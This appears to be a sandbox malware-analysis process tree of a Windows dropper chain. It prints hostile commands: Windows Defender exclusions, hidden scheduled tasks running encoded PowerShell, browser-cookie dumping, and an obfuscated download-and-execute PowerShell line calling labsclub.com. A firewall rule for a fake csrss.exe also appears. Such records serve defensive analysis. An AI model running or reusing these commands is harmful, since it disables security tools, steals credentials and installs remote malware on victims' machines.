C:\Users\Admin\AppData\Local\Temp\lqps54tm4kq\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\lqps54tm4kq\askinstall24.exe"76⤵PID:14208
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe77⤵PID:12452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe78⤵
- Kills process with taskkill
PID:7384 -
C:\Users\Admin\AppData\Local\Temp\ms2eoxnme1c\vict.exe"C:\Users\Admin\AppData\Local\Temp\ms2eoxnme1c\vict.exe" /VERYSILENT /id=53576⤵PID:6132
-
C:\Users\Admin\AppData\Local\Temp\is-BC9SP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-BC9SP.tmp\vict.tmp" /SL5="$207CC,870426,780800,C:\Users\Admin\AppData\Local\Temp\ms2eoxnme1c\vict.exe" /VERYSILENT /id=53577⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\is-87EUP.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-87EUP.tmp\wimapi.exe" 53578⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\lgd3ioskb2k\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\lgd3ioskb2k\AwesomePoolU1.exe"76⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\I93SYPOTKD\setups.exe"C:\Users\Admin\AppData\Local\Temp\I93SYPOTKD\setups.exe" ll73⤵PID:14744
-
C:\Users\Admin\AppData\Local\Temp\is-LR51S.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LR51S.tmp\setups.tmp" /SL5="$C0490,549376,61440,C:\Users\Admin\AppData\Local\Temp\I93SYPOTKD\setups.exe" ll74⤵PID:16280
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rfo5rg3.ypr\setup.exe /S /kr /site_id=754 & exit71⤵PID:13680
-
C:\Users\Admin\AppData\Local\Temp\0rfo5rg3.ypr\setup.exeC:\Users\Admin\AppData\Local\Temp\0rfo5rg3.ypr\setup.exe /S /kr /site_id=75472⤵PID:14232
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"73⤵PID:7788
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&74⤵PID:15080
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3275⤵PID:17420
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6475⤵PID:18356
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJrTypDNt" /SC once /ST 07:42:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="73⤵
- Creates scheduled task(s)
PID:17952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJrTypDNt"73⤵PID:4116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJrTypDNt"73⤵PID:16412
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\igiJETM.exe\" nh /site_id 754 /S" /V1 /F73⤵
- Creates scheduled task(s)
PID:8188 -
C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\hjjgaa.exe" /Verysilent65⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt66⤵PID:7924
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt66⤵PID:656
-
C:\Users\Admin\AppData\Local\Temp\9BAR6A7F99\setups.exe"C:\Users\Admin\AppData\Local\Temp\9BAR6A7F99\setups.exe" ll58⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\is-BHGRM.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BHGRM.tmp\setups.tmp" /SL5="$A0278,549376,61440,C:\Users\Admin\AppData\Local\Temp\9BAR6A7F99\setups.exe" ll59⤵PID:10304
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slfmx03l.cek\setup.exe /S /kr /site_id=754 & exit56⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\slfmx03l.cek\setup.exeC:\Users\Admin\AppData\Local\Temp\slfmx03l.cek\setup.exe /S /kr /site_id=75457⤵PID:11704
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"58⤵PID:2056
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&59⤵PID:12272
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3260⤵PID:2072
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6460⤵PID:14948
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpSuenTUE" /SC once /ST 11:02:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="58⤵
- Creates scheduled task(s)
PID:17280 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpSuenTUE"58⤵PID:16700
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpSuenTUE"58⤵PID:15408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\hHGyppt.exe\" nh /site_id 754 /S" /V1 /F58⤵PID:16572
-
C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\hjjgaa.exe" /Verysilent50⤵PID:17200
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt51⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt51⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\g1ns1ahfut1\vict.exe"C:\Users\Admin\AppData\Local\Temp\g1ns1ahfut1\vict.exe" /VERYSILENT /id=53546⤵PID:13588
-
C:\Users\Admin\AppData\Local\Temp\is-50FTI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-50FTI.tmp\vict.tmp" /SL5="$605DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\g1ns1ahfut1\vict.exe" /VERYSILENT /id=53547⤵PID:12956
-
C:\Users\Admin\AppData\Local\Temp\is-BI58V.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-BI58V.tmp\wimapi.exe" 53548⤵PID:12796
-
C:\Users\Admin\AppData\Local\Temp\4tyemle0qlw\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\4tyemle0qlw\askinstall24.exe"46⤵PID:8408
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe47⤵PID:5116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe48⤵
- Kills process with taskkill
PID:17260 -
C:\Users\Admin\AppData\Local\Temp\Y5NSMYBEWO\setups.exe"C:\Users\Admin\AppData\Local\Temp\Y5NSMYBEWO\setups.exe" ll43⤵PID:10300
-
C:\Users\Admin\AppData\Local\Temp\is-6P71O.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6P71O.tmp\setups.tmp" /SL5="$505BA,549376,61440,C:\Users\Admin\AppData\Local\Temp\Y5NSMYBEWO\setups.exe" ll44⤵PID:11396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlqzepg1.d3l\setup.exe /S /kr /site_id=754 & exit41⤵PID:9632
-
C:\Users\Admin\AppData\Local\Temp\hlqzepg1.d3l\setup.exeC:\Users\Admin\AppData\Local\Temp\hlqzepg1.d3l\setup.exe /S /kr /site_id=75442⤵PID:15828
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"43⤵PID:10792
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&44⤵PID:12424
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3245⤵PID:10988
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6445⤵PID:11188
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPshjMKsh" /SC once /ST 08:17:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="43⤵
- Creates scheduled task(s)
PID:9104 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPshjMKsh"43⤵PID:12492
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPshjMKsh"43⤵PID:15352
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\QJpEgYx.exe\" nh /site_id 754 /S" /V1 /F43⤵
- Creates scheduled task(s)
PID:16984 -
C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\hjjgaa.exe" /Verysilent35⤵PID:15348
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt36⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt36⤵PID:4804
-
C:\Users\Admin\AppData\Local\Temp\kgjnt2bm5yu\app.exe"C:\Users\Admin\AppData\Local\Temp\kgjnt2bm5yu\app.exe" /8-2331⤵PID:16232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Purple-Paper"32⤵PID:16308
-
C:\Program Files (x86)\Purple-Paper\7za.exe"C:\Program Files (x86)\Purple-Paper\7za.exe" e -p154.61.71.51 winamp-plugins.7z32⤵PID:4432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Purple-Paper\app.exe" -map "C:\Program Files (x86)\Purple-Paper\WinmonProcessMonitor.sys""32⤵PID:2264
-
C:\Program Files (x86)\Purple-Paper\app.exe"C:\Program Files (x86)\Purple-Paper\app.exe" -map "C:\Program Files (x86)\Purple-Paper\WinmonProcessMonitor.sys"33⤵PID:7164
-
C:\Program Files (x86)\Purple-Paper\7za.exe"C:\Program Files (x86)\Purple-Paper\7za.exe" e -p154.61.71.51 winamp.7z32⤵PID:7388
-
C:\Program Files (x86)\Purple-Paper\app.exe"C:\Program Files (x86)\Purple-Paper\app.exe" /8-2332⤵PID:10396
-
C:\Program Files (x86)\Purple-Paper\app.exe"C:\Program Files (x86)\Purple-Paper\app.exe" /8-2333⤵PID:11976
-
C:\Users\Admin\AppData\Local\Temp\BT2S31R98M\setups.exe"C:\Users\Admin\AppData\Local\Temp\BT2S31R98M\setups.exe" ll28⤵PID:12680
-
C:\Users\Admin\AppData\Local\Temp\is-36H4K.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-36H4K.tmp\setups.tmp" /SL5="$30334,549376,61440,C:\Users\Admin\AppData\Local\Temp\BT2S31R98M\setups.exe" ll29⤵PID:12768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vg2stflg.cyr\setup.exe /S /kr /site_id=754 & exit26⤵PID:11372
-
C:\Users\Admin\AppData\Local\Temp\vg2stflg.cyr\setup.exeC:\Users\Admin\AppData\Local\Temp\vg2stflg.cyr\setup.exe /S /kr /site_id=75427⤵PID:11904
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"28⤵PID:12708
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&29⤵PID:12924
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6430⤵PID:13044
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLFsMhoXH" /SC once /ST 00:06:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="28⤵
- Creates scheduled task(s)
PID:13328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLFsMhoXH"28⤵PID:10932
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLFsMhoXH"28⤵PID:17436
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\GNXhZGy.exe\" nh /site_id 754 /S" /V1 /F28⤵PID:15128
-
C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\hjjgaa.exe" /Verysilent20⤵PID:10748
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt21⤵PID:11256
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt21⤵PID:12892
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt21⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\bhtojgtfeii\v2jb4qjnxkb.exe"C:\Users\Admin\AppData\Local\Temp\bhtojgtfeii\v2jb4qjnxkb.exe" /VERYSILENT16⤵
- Executes dropped EXE
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\is-BO8BJ.tmp\v2jb4qjnxkb.tmp"C:\Users\Admin\AppData\Local\Temp\is-BO8BJ.tmp\v2jb4qjnxkb.tmp" /SL5="$302D0,870426,780800,C:\Users\Admin\AppData\Local\Temp\bhtojgtfeii\v2jb4qjnxkb.exe" /VERYSILENT17⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\is-TVFLV.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-TVFLV.tmp\winlthst.exe" test1 test118⤵
- Executes dropped EXE
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\01l7JAVSi.exe"C:\Users\Admin\AppData\Local\Temp\01l7JAVSi.exe"19⤵
- Suspicious use of SetThreadContext
PID:7416 -
C:\Users\Admin\AppData\Local\Temp\01l7JAVSi.exe"C:\Users\Admin\AppData\Local\Temp\01l7JAVSi.exe"20⤵PID:5056
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"19⤵PID:6804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"20⤵PID:6608
-
C:\Users\Admin\AppData\Local\Temp\vzngpbqnkj5\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\vzngpbqnkj5\askinstall24.exe"16⤵
- Executes dropped EXE
PID:4344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:5552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5792 -
C:\Users\Admin\AppData\Local\Temp\bbs300hyxnl\vict.exe"C:\Users\Admin\AppData\Local\Temp\bbs300hyxnl\vict.exe" /VERYSILENT /id=53516⤵
- Executes dropped EXE
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\is-15OTC.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-15OTC.tmp\vict.tmp" /SL5="$202BA,870426,780800,C:\Users\Admin\AppData\Local\Temp\bbs300hyxnl\vict.exe" /VERYSILENT /id=53517⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\is-GSO29.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-GSO29.tmp\wimapi.exe" 53518⤵
- Executes dropped EXE
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\gahkkRosw.exe"C:\Users\Admin\AppData\Local\Temp\gahkkRosw.exe"19⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7312 -
C:\Users\Admin\AppData\Local\Temp\gahkkRosw.exe"C:\Users\Admin\AppData\Local\Temp\gahkkRosw.exe"20⤵
- Checks processor information in registry
PID:7576 -
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"19⤵PID:17176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"20⤵PID:5052
-
C:\Users\Admin\AppData\Local\Temp\sksx45h534b\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\sksx45h534b\AwesomePoolU1.exe"16⤵
- Executes dropped EXE
PID:4328 -
C:\Users\Admin\AppData\Local\Temp\k1grayvdhnn\vpn.exe"C:\Users\Admin\AppData\Local\Temp\k1grayvdhnn\vpn.exe" /silent /subid=48216⤵
- Executes dropped EXE
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\is-5SR08.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-5SR08.tmp\vpn.tmp" /SL5="$303BE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\k1grayvdhnn\vpn.exe" /silent /subid=48217⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:4648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "18⤵PID:6232
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090119⤵PID:6884
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "18⤵PID:9256
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090119⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:9440 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7928 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9200 -
C:\Users\Admin\AppData\Local\Temp\fj13fembspw\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\fj13fembspw\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq16⤵
- Executes dropped EXE
PID:4660 -
C:\Users\Admin\AppData\Local\Temp\is-7099A.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-7099A.tmp\IBInstaller_97039.tmp" /SL5="$1049A,14597143,721408,C:\Users\Admin\AppData\Local\Temp\fj13fembspw\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq17⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4768 -
C:\Users\Admin\AppData\Local\Temp\is-IJ7PF.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-IJ7PF.tmp\{app}\chrome_proxy.exe"18⤵
- Executes dropped EXE
PID:5144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-IJ7PF.tmp\{app}\chrome_proxy.exe"19⤵PID:8332
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 420⤵
- Runs ping.exe
PID:8500 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703918⤵
- Checks computer location settings
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\bn0b3qcx0bk\app.exe"C:\Users\Admin\AppData\Local\Temp\bn0b3qcx0bk\app.exe" /8-2316⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Twilight-Cloud"17⤵PID:4932
-
C:\Program Files (x86)\Twilight-Cloud\7za.exe"C:\Program Files (x86)\Twilight-Cloud\7za.exe" e -p154.61.71.51 winamp-plugins.7z17⤵
- Drops file in Program Files directory
PID:7544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Twilight-Cloud\app.exe" -map "C:\Program Files (x86)\Twilight-Cloud\WinmonProcessMonitor.sys""17⤵PID:6024
-
C:\Program Files (x86)\Twilight-Cloud\app.exe"C:\Program Files (x86)\Twilight-Cloud\app.exe" -map "C:\Program Files (x86)\Twilight-Cloud\WinmonProcessMonitor.sys"18⤵
- Suspicious behavior: LoadsDriver
PID:6668 -
C:\Program Files (x86)\Twilight-Cloud\7za.exe"C:\Program Files (x86)\Twilight-Cloud\7za.exe" e -p154.61.71.51 winamp.7z17⤵
- Drops file in Program Files directory
PID:7940 -
C:\Program Files (x86)\Twilight-Cloud\app.exe"C:\Program Files (x86)\Twilight-Cloud\app.exe" /8-2317⤵PID:8748
-
C:\Program Files (x86)\Twilight-Cloud\app.exe"C:\Program Files (x86)\Twilight-Cloud\app.exe" /8-2318⤵PID:10940
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"19⤵PID:6932
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes20⤵PID:4224
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2319⤵PID:5604
